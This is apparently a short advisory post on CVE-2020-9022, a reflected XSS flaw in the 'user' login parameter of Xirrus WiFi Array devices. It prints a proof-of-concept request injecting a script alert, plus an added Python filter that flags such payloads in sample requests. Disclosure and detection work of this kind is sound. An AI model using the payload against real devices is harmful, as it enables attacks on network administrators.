Friday, January 24, 2020

[Xirrus] - Xirrus WiFi - XSS - (CVE-2020-9022)




                                             



The Xirrus XR520, XR620, XR2436 and XH2-120 WiFi Array devices are vulnerable to reflected Cross-Site Scripting (XSS) at login, specifically in the "user" parameter.



Affected Devices:
  • Xirrus XR520 WiFi Array
  • Xirrus XR620 WiFi Array
  • Xirrus XR2436 WiFi Array
  • Xirrus XH2-120 WiFi Array



The following JavaScript code is injected into the "user" parameter:

GET Request

https://192.x.x.x/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin<script>alert('XSS')</script>&pass=admin&click_to_login=login
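A defensive check for the parameter shown above, as an added example that is not part of the original advisory or any vendor code: a filter that a reverse proxy or log pipeline in front of the management interface could apply to login requests, flagging any "user" value outside an allow-list. The allow-list pattern, the function names, the sample requests and the assumption that a POST form carries the same field names as the GET request are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

LOGIN_PATH = "/cgi-bin/ViewPage.cgi"  # path taken from the advisory
# Assumption: legitimate login names need only these characters.
SAFE_USER = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def flagged_user_values(method, target, body=""):
    """Return decoded 'user' values that fail the allow-list.

    Covers the query string (GET) and a form-encoded body (POST).
    """
    parts = urlsplit(target)
    if parts.path != LOGIN_PATH:
        return []
    sources = [parts.query]
    if method.upper() == "POST":
        # Assumption: the POST body uses the same field names as the GET form.
        sources.append(body)
    flagged = []
    for raw in sources:
        # parse_qs percent-decodes, so %3Cscript%3E is inspected as <script>
        for value in parse_qs(raw, keep_blank_values=True).get("user", []):
            if not SAFE_USER.fullmatch(value):
                flagged.append(value)
    return flagged


# Constructed sample requests: (method, request target, body)
SAMPLES = [
    ("GET", "/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin&pass=admin&click_to_login=login", ""),
    ("GET", "/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&pass=admin&click_to_login=login", ""),
    ("POST", "/cgi-bin/ViewPage.cgi", "wmi_login=1&user=admin%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&pass=admin&click_to_login=login"),
    ("GET", "/index.html?user=%3Cb%3E", ""),  # different path, out of scope
]


def scan(samples):
    """Return (index, value) for every request to block or alert on."""
    return [(i, v) for i, s in enumerate(samples) for v in flagged_user_values(*s)]


if __name__ == "__main__":
    for index, value in scan(SAMPLES):
        print(f"request {index}: rejected user value {value!r}")
```

An allow-list on the login name is a compensating control only; the underlying fix is for the device to HTML-encode the "user" value wherever the login page reflects it.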


POST












Shodan



CVE-2020-9022
By: @Linuxmonr4




